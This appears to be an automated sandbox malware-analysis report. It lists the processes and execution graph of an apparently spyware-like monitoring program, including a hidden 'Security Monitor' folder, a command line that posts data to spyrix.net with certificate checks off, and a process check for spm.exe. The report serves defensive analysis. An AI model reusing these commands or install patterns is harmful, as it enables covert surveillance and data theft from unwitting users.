                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff6fee10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:76
                                                                                                                                                                                                                                                          Start time:01:58:47
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:cmd /c exit 83
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:77
                                                                                                                                                                                                                                                          Start time:01:58:47
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:3'588'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:78
                                                                                                                                                                                                                                                          Start time:01:58:47
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:cmd /c exit 112
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:79
                                                                                                                                                                                                                                                          Start time:01:58:47
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:80
                                                                                                                                                                                                                                                          Start time:01:58:47
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:cmd /c exit 121
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:81
                                                                                                                                                                                                                                                          Start time:01:58:49
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:cmd /c exit 114
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:82
                                                                                                                                                                                                                                                          Start time:01:58:49
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:cmd /c exit 105
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:83
                                                                                                                                                                                                                                                          Start time:01:58:49
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:cmd /c exit 120
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:84
                                                                                                                                                                                                                                                          Start time:01:58:49
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
                                                                                                                                                                                                                                                          Imagebase:0x310000
                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:85
                                                                                                                                                                                                                                                          Start time:01:58:49
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:find "spm"
                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:12.7%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                            Signature Coverage:4.3%
                                                                                                                                                                                                                                                            Total number of Nodes:304
                                                                                                                                                                                                                                                            Total number of Limit Nodes:19
                                                                                                                                                                                                                                                            execution_graph 40871 242d2c0 DuplicateHandle 40872 242d356 40871->40872 40916 83e6a98 40917 83e6add GetClassInfoW 40916->40917 40919 83e6b23 40917->40919 41172 83e40e8 41173 83e410b 41172->41173 41174 83e4101 41172->41174 41174->41173 41176 83e37c8 41174->41176 41177 83e37d3 41176->41177 41180 83eac95 41177->41180 41182 83e9a1c 41177->41182 41179 83eacdb 41179->41173 41180->41179 41181 83e9a1c OleInitialize 41180->41181 41181->41179 41183 83e9a27 41182->41183 41184 83e22a0 OleInitialize 41183->41184 41185 83ead06 41183->41185 41184->41185 41185->41180 40873 9b99ba1 40876 9b98634 40873->40876 40877 9b9863f 40876->40877 40880 9b98a5c 40877->40880 40882 9b98644 40877->40882 40879 9b98aa4 40880->40879 40891 9b98654 40880->40891 40884 9b9864f 40882->40884 40883 9b98aec 40883->40880 40884->40883 40885 9b98ae1 40884->40885 40887 9b98af0 40884->40887 40897 9b98664 40885->40897 40888 9b98c0e 40887->40888 40902 83e4ec0 40887->40902 40907 83e4eaf 40887->40907 40888->40880 40892 9b9865f 40891->40892 40894 9b99f4d 40892->40894 40895 83e4eaf 2 API calls 40892->40895 40896 83e4ec0 2 API calls 40892->40896 40893 9b99f49 40893->40879 40894->40879 40895->40893 40896->40893 40898 9b9866f 40897->40898 40899 9b98c0e 40898->40899 40900 83e4eaf 2 API calls 40898->40900 40901 83e4ec0 2 API calls 40898->40901 40899->40883 40900->40899 40901->40899 40903 83e4ed0 40902->40903 40912 83e4ef8 PostMessageW 40903->40912 40914 83e4ef1 PostMessageW 40903->40914 40904 83e4ee1 40904->40888 40908 83e4ed0 40907->40908 40910 83e4ef8 PostMessageW 40908->40910 40911 83e4ef1 PostMessageW 40908->40911 40909 83e4ee1 40909->40888 40910->40909 40911->40909 40913 83e4f64 40912->40913 40913->40904 40915 83e4f64 40914->40915 40915->40904 41132 9b98981 41133 9b98998 41132->41133 41134 9b98997 41132->41134 41138 9b989b8 41133->41138 41143 9b989a8 41133->41143 41135 9b989a0 41139 9b989cc 41138->41139 41140 9b98634 2 API calls 41139->41140 41142 9b989e8 41139->41142 41141 9b98a25 41140->41141 41141->41135 41142->41135 41144 9b989cc 41143->41144 41145 9b98634 2 API calls 41144->41145 41147 9b989e8 41144->41147 41146 9b98a25 41145->41146 41146->41135 41147->41135 41186 9b9c150 41187 9b9c164 41186->41187 41191 9b9c2a8 41187->41191 41195 9b9c280 41187->41195 41188 9b9c236 41199 9b9c2f1 41191->41199 41204 9b9c300 41191->41204 41192 9b9c2b6 41192->41188 41196 9b9c2b6 41195->41196 41197 9b9c2f1 7 API calls 41195->41197 41198 9b9c300 7 API calls 41195->41198 41196->41188 41197->41196 41198->41196 41200 9b9c322 41199->41200 41201 9b9c377 41200->41201 41209 9b9c451 41200->41209 41213 9b9c460 41200->41213 41201->41192 41205 9b9c322 41204->41205 41206 9b9c377 41205->41206 41207 9b9c451 7 API calls 41205->41207 41208 9b9c460 7 API calls 41205->41208 41206->41192 41207->41206 41208->41206 41210 9b9c46f 41209->41210 41211 9b9c4db 41210->41211 41217 9b9c5b1 41210->41217 41211->41201 41214 9b9c46f 41213->41214 41215 9b9c4db 41214->41215 41216 9b9c5b1 7 API calls 41214->41216 41215->41201 41216->41215 41221 9b9c5e0 41217->41221 41230 9b9c5d0 41217->41230 41218 9b9c5ca 41218->41211 41222 9b9c63d 41221->41222 41223 9b9c688 GetCurrentThreadId 41222->41223 41224 9b9c67b 41222->41224 41227 9b9c683 41222->41227 41225 9b9c6b6 41223->41225 41239 9b9bf7c 41224->41239 41225->41227 41228 9b9d8d1 4 API calls 41225->41228 41229 9b9d8e0 4 API calls 41225->41229 41228->41227 41229->41227 41231 9b9c63d 41230->41231 41232 9b9c688 GetCurrentThreadId 41231->41232 41233 9b9c67b 41231->41233 41236 9b9c683 41231->41236 41234 9b9c6b6 41232->41234 41235 9b9bf7c PostThreadMessageW 41233->41235 41234->41236 41237 9b9d8d1 4 API calls 41234->41237 41238 9b9d8e0 4 API calls 41234->41238 41235->41236 41237->41236 41238->41236 41240 9b9bf87 PostThreadMessageW 41239->41240 41242 9b9c94b 41240->41242 41242->41227 40920 2424668 40921 2424672 40920->40921 40928 2424758 40920->40928 40933 2423e1c 40921->40933 40923 242468d 40937 83e3038 40923->40937 40941 83e3048 40923->40941 40929 242477d 40928->40929 40945 2424858 40929->40945 40949 2424868 40929->40949 40934 2423e27 40933->40934 40936 2426f8d 40934->40936 40957 2425bfc 40934->40957 40936->40923 40938 83e305a 40937->40938 41012 83e2010 40938->41012 40942 83e305a 40941->40942 40943 83e2010 15 API calls 40942->40943 40944 2424695 40943->40944 40947 242488f 40945->40947 40946 242496c 40946->40946 40947->40946 40953 242449c 40947->40953 40951 242488f 40949->40951 40950 242496c 40950->40950 40951->40950 40952 242449c CreateActCtxA 40951->40952 40952->40950 40954 24258f8 CreateActCtxA 40953->40954 40956 24259bb 40954->40956 40958 2425c07 40957->40958 40961 2425c1c 40958->40961 40960 242704d 40960->40936 40962 2425c27 40961->40962 40965 2425c4c 40962->40965 40964 2427122 40964->40960 40966 2425c57 40965->40966 40969 2425c7c 40966->40969 40968 2427225 40968->40964 40970 2425c87 40969->40970 40972 24283b8 40970->40972 40975 2428661 40970->40975 40971 2428651 40971->40968 40972->40971 40980 242cdb4 40972->40980 40976 242866f 40975->40976 40977 2428604 40975->40977 40976->40972 40978 2428651 40977->40978 40979 242cdb4 2 API calls 40977->40979 40978->40972 40979->40978 40981 242cdd1 40980->40981 40982 242cdf5 40981->40982 40985 242cf60 40981->40985 40989 242cf34 40981->40989 40982->40971 40986 242cf6d 40985->40986 40987 242cfa7 40986->40987 40993 242c898 40986->40993 40987->40982 40990 242cf6d 40989->40990 40991 242c898 2 API calls 40990->40991 40992 242cfa7 40990->40992 40991->40992 40992->40982 40994 242c89d 40993->40994 40995 242d8b8 40994->40995 40997 242c9c4 40994->40997 40998 242c9cf 40997->40998 40999 2425c7c 2 API calls 40998->40999 41000 242d927 40999->41000 41003 242d936 41000->41003 41004 242dda8 41000->41004 41008 242dda2 41000->41008 41003->40995 41005 242ddd6 41004->41005 41006 242dea2 KiUserCallbackDispatcher 41005->41006 41007 242dea7 41005->41007 41006->41007 41007->41007 41009 242ddd6 41008->41009 41010 242dea2 KiUserCallbackDispatcher 41009->41010 41011 242dea7 41009->41011 41010->41011 41011->41011 41014 83e201b 41012->41014 41016 83e204c 41014->41016 41015 83e318c 41015->41015 41017 83e2057 41016->41017 41025 83e329e 41017->41025 41026 83e3432 41017->41026 41029 83e2268 41017->41029 41018 83e33f8 41019 83e3407 41018->41019 41020 83e22a0 OleInitialize 41018->41020 41019->41026 41034 83e22a0 41019->41034 41020->41019 41022 83e2268 2 API calls 41022->41018 41025->41018 41025->41022 41026->41015 41030 83e2273 41029->41030 41065 83e3a50 41030->41065 41070 83e3a40 41030->41070 41031 83e3634 41031->41025 41036 83e22ab 41034->41036 41035 83e341f 41039 9b9003b 41035->41039 41052 9b90040 41035->41052 41036->41035 41075 83e9abc 41036->41075 41038 83ead94 41040 9b900a5 41039->41040 41041 9b902d1 41040->41041 41042 9b90508 WaitMessage 41040->41042 41043 9b900f2 41040->41043 41082 9b90608 PeekMessageW 41040->41082 41084 9b90600 41040->41084 41088 9b908d8 KiUserCallbackDispatcher 41040->41088 41090 9b908d0 41040->41090 41108 9b90da0 41040->41108 41112 9b90da8 DispatchMessageW 41040->41112 41094 9b9d8e0 41041->41094 41101 9b9d8d1 41041->41101 41042->41040 41043->41026 41053 9b900a5 41052->41053 41054 9b902d1 41053->41054 41055 9b90508 WaitMessage 41053->41055 41056 9b900f2 41053->41056 41057 9b90da8 DispatchMessageW 41053->41057 41058 9b90da0 DispatchMessageW 41053->41058 41059 9b908d8 KiUserCallbackDispatcher 41053->41059 41060 9b908d0 KiUserCallbackDispatcher 41053->41060 41063 9b90608 PeekMessageW 41053->41063 41064 9b90600 PeekMessageW 41053->41064 41061 9b9d8d1 4 API calls 41054->41061 41062 9b9d8e0 4 API calls 41054->41062 41055->41053 41056->41026 41057->41053 41058->41053 41059->41053 41060->41053 41061->41056 41062->41056 41063->41053 41064->41053 41066 83e3a76 41065->41066 41067 83e3a8a 41066->41067 41068 242dda2 KiUserCallbackDispatcher 41066->41068 41069 242dda8 KiUserCallbackDispatcher 41066->41069 41067->41031 41068->41067 41069->41067 41071 83e3a76 41070->41071 41072 83e3a8a 41071->41072 41073 242dda2 KiUserCallbackDispatcher 41071->41073 41074 242dda8 KiUserCallbackDispatcher 41071->41074 41072->41031 41073->41072 41074->41072 41076 83e9ac7 41075->41076 41077 83eb08b 41076->41077 41079 83e9ad8 41076->41079 41077->41038 41080 83eb0c0 OleInitialize 41079->41080 41081 83eb124 41080->41081 41081->41077 41083 9b9067f 41082->41083 41083->41040 41085 9b905fc 41084->41085 41086 9b90607 PeekMessageW 41084->41086 41085->41084 41087 9b9067f 41086->41087 41087->41040 41089 9b9094c 41088->41089 41089->41040 41091 9b908cc 41090->41091 41091->41090 41092 9b908d7 KiUserCallbackDispatcher 41091->41092 41093 9b9094c 41092->41093 41093->41040 41095 9b9d8ff 41094->41095 41114 9b9d9bf 41095->41114 41120 9b9d9d0 41095->41120 41096 9b9d933 41126 9b9c088 GetCurrentThreadId 41096->41126 41098 9b9d942 41098->41043 41102 9b9d8ff 41101->41102 41106 9b9d9bf 2 API calls 41102->41106 41107 9b9d9d0 2 API calls 41102->41107 41103 9b9d933 41131 9b9c088 GetCurrentThreadId 41103->41131 41105 9b9d942 41105->41043 41106->41103 41107->41103 41109 9b90d9c 41108->41109 41110 9b90da7 DispatchMessageW 41108->41110 41109->41108 41111 9b90e14 41110->41111 41111->41040 41113 9b90e14 41112->41113 41113->41040 41115 9b9da1f GetCurrentThreadId 41114->41115 41117 9b9da65 41115->41117 41127 9b9c0dc 41117->41127 41121 9b9da1f GetCurrentThreadId 41120->41121 41123 9b9da65 41121->41123 41124 9b9c0dc EnumThreadWindows 41123->41124 41125 9b9daa0 41124->41125 41125->41096 41126->41098 41128 9b9dac0 EnumThreadWindows 41127->41128 41130 9b9daa0 41128->41130 41130->41096 41131->41105 41148 242d078 41149 242d0be GetCurrentProcess 41148->41149 41151 242d110 GetCurrentThread 41149->41151 41152 242d109 41149->41152 41153 242d146 41151->41153 41154 242d14d GetCurrentProcess 41151->41154 41152->41151 41153->41154 41155 242d183 41154->41155 41156 242d1ab GetCurrentThreadId 41155->41156 41157 242d1dc 41156->41157 41158 242acf8 41159 242ad07 41158->41159 41162 242ade0 41158->41162 41167 242adf0 41158->41167 41163 242ae24 41162->41163 41164 242ae01 41162->41164 41163->41159 41164->41163 41165 242b028 GetModuleHandleW 41164->41165 41166 242b055 41165->41166 41166->41159 41168 242ae01 41167->41168 41169 242ae24 41167->41169 41168->41169 41170 242b028 GetModuleHandleW 41168->41170 41169->41159 41171 242b055 41170->41171 41171->41159 41243 83e9453 41244 83e9466 41243->41244 41248 83e9653 PostMessageW 41244->41248 41250 83e9680 PostMessageW 41244->41250 41245 83e9489 41249 83e96ec 41248->41249 41249->41245 41251 83e96ec 41250->41251 41251->41245 41252 83e49c0 41253 83e4a08 SetWindowTextW 41252->41253 41254 83e4a02 41252->41254 41255 83e4a39 41253->41255 41254->41253

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 345 9b92df0-9b92e0f 346 9b92f39-9b92f5e 345->346 347 9b92e15-9b92e35 call 9b91124 345->347 356 9b92f65-9b92f91 346->356 351 9b92e45-9b92e4e 347->351 352 9b92e37-9b92e3a 347->352 355 9b92e56-9b92e58 351->355 352->351 353 9b92e3c-9b92e3f 352->353 353->351 353->356 357 9b92f2c-9b92f36 355->357 358 9b92e5e-9b92e6e 355->358 380 9b92f98 356->380 360 9b92e70-9b92e75 358->360 361 9b92e77-9b92e7c 358->361 363 9b92ea7-9b92ecf call 9b91130 360->363 364 9b92e8c-9b92e91 361->364 365 9b92e7e-9b92e8a 361->365 372 9b92f9d-9b92fab 363->372 373 9b92ed5-9b92ee8 363->373 366 9b92e93-9b92ea0 364->366 367 9b92ea2-9b92ea4 364->367 365->363 366->363 367->363 377 9b92fac-9b92fb5 372->377 378 9b92f28-9b92f2a 373->378 379 9b92eea-9b92f26 373->379 385 9b92fb6-9b92ffa call 9b9114c 377->385 378->357 378->380 379->378 380->372 390 9b93000-9b93011 385->390 391 9b930f4 385->391 397 9b930c1-9b930ed 390->397 398 9b93017-9b9305f call 9b91158 390->398 393 9b930f9-9b930fd 391->393 395 9b930ff-9b9310e 393->395 396 9b93111 393->396 395->396 399 9b93112 396->399 397->391 411 9b93088-9b9308c 398->411 412 9b93061-9b93086 398->412 399->399 413 9b9308e-9b930a0 call 9b91158 411->413 414 9b930a5-9b930bf 411->414 412->393 413->414 414->393
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: $(&q$(q$Hq
                                                                                                                                                                                                                                                            • API String ID: 0-2282635851
                                                                                                                                                                                                                                                            • Opcode ID: f78fe6123a1a5627812081beb110e9de2327e26b13218966e69ca39467735d96
                                                                                                                                                                                                                                                            • Instruction ID: 03251a31350e4a2e980754eba2061def3f7cb18fbe8b98975558c8323d019c10
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f78fe6123a1a5627812081beb110e9de2327e26b13218966e69ca39467735d96
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F391A270E10215AFEF18DF69C8456AFBBF6EFC8310F108579E415EB254DB35990287A4

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 472 9b90040-9b900a3 473 9b900d2-9b900f0 472->473 474 9b900a5-9b900cf 472->474 479 9b900f9-9b90130 473->479 480 9b900f2-9b900f4 473->480 474->473 484 9b90561 479->484 485 9b90136-9b9014a 479->485 481 9b905b2-9b905c7 480->481 488 9b90566-9b9057c 484->488 486 9b90179-9b90198 485->486 487 9b9014c-9b90176 485->487 494 9b9019a-9b901a0 486->494 495 9b901b0-9b901b2 486->495 487->486 488->481 497 9b901a2 494->497 498 9b901a4-9b901a6 494->498 499 9b901d1-9b901da 495->499 500 9b901b4-9b901cc 495->500 497->495 498->495 501 9b901e2-9b901e9 499->501 500->488 502 9b901eb-9b901f1 501->502 503 9b901f3-9b901fa 501->503 504 9b90207-9b9021b 502->504 505 9b901fc-9b90202 503->505 506 9b90204 503->506 581 9b9021d call 9b90608 504->581 582 9b9021d call 9b90600 504->582 505->504 506->504 507 9b90222-9b90224 508 9b90379-9b9037d 507->508 509 9b9022a-9b90231 507->509 510 9b9054c-9b9055f 508->510 511 9b90383-9b90387 508->511 509->484 512 9b90237-9b90274 509->512 510->488 513 9b90389-9b9039c 511->513 514 9b903a1-9b903aa 511->514 520 9b9027a-9b9027f 512->520 521 9b90542-9b90546 512->521 513->488 515 9b903d9-9b903e0 514->515 516 9b903ac-9b903d6 514->516 518 9b9047f-9b90494 515->518 519 9b903e6-9b903ed 515->519 516->515 518->521 532 9b9049a-9b9049c 518->532 523 9b9041c-9b9043e 519->523 524 9b903ef-9b90419 519->524 525 9b902b1-9b902c4 520->525 526 9b90281-9b9028f 520->526 521->501 521->510 523->518 555 9b90440-9b9044a 523->555 524->523 530 9b902cb-9b902cf 525->530 526->525 534 9b90291-9b902a8 526->534 535 9b902d1-9b902d8 530->535 536 9b90340-9b9034d 530->536 537 9b904e9-9b90506 532->537 538 9b9049e-9b904d7 532->538 577 9b902aa call 9b908d8 534->577 578 9b902aa call 9b908d0 534->578 579 9b902da call 9b9d8d1 535->579 580 9b902da call 9b9d8e0 535->580 536->521 549 9b90353-9b9035d 536->549 537->521 548 9b90508-9b90534 WaitMessage 537->548 551 9b904d9-9b904df 538->551 552 9b904e0-9b904e7 538->552 542 9b902af 542->530 553 9b9053b 548->553 554 9b90536 548->554 561 9b9036c 549->561 562 9b9035f 549->562 551->552 552->521 553->521 554->553 564 9b9044c-9b90452 555->564 565 9b90462-9b9047d 555->565 556 9b902df-9b902e3 559 9b90323-9b9033b 556->559 560 9b902e5-9b90315 556->560 559->488 567 9b9031c 560->567 568 9b90317 560->568 570 9b90374 561->570 575 9b90362 call 9b90da8 562->575 576 9b90362 call 9b90da0 562->576 571 9b90454 564->571 572 9b90456-9b90458 564->572 565->518 565->555 567->559 568->567 569 9b90367 569->521 570->521 571->565 572->565 575->569 576->569 577->542 578->542 579->556 580->556 581->507 582->507
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f910060785ae6ac48534602bbd06f528518b2014b02199a278fbc6ed5b56b409
                                                                                                                                                                                                                                                            • Instruction ID: 5d98e1b07619ded066a1546e7c46bfbbcbfa5113e7a1f0f321264ed32b0a4549
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f910060785ae6ac48534602bbd06f528518b2014b02199a278fbc6ed5b56b409
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F13B30A202198FEB14EFA5C845BADBBF1FF88714F1581A9E409AF365DB70A945CB40
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1652135566.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9b90000_404.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: c49743ba7e9c4f85fbd3dc8636b91b1c73ca24675696d14edea1b6909788e4be
                                                                                                                                                                                                                                                            • Instruction ID: f574cee9268625bde5dd2a829953364b2048664db579a6a4bc251866dd6ebceb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c49743ba7e9c4f85fbd3dc8636b91b1c73ca24675696d14edea1b6909788e4be
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D1BC31B217208FEB15DF76D960B6E77E6EF89700F1044AEE546CB2A0CA35E805CB51

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 294 242d069-242d070 295 242d072-242d107 GetCurrentProcess 294->295 296 242d02b-242d067 294->296 303 242d110-242d144 GetCurrentThread 295->303 304 242d109-242d10f 295->304 305 242d146-242d14c 303->305 306 242d14d-242d181 GetCurrentProcess 303->306 304->303 305->306 309 242d183-242d189 306->309 310 242d18a-242d1a5 call 242d248 306->310 309->310 314 242d1ab-242d1da GetCurrentThreadId 310->314 315 242d1e3-242d245 314->315 316 242d1dc-242d1e2 314->316 316->315
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0242D0F6
                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0242D133
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0242D170
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0242D1C9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1648230286.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
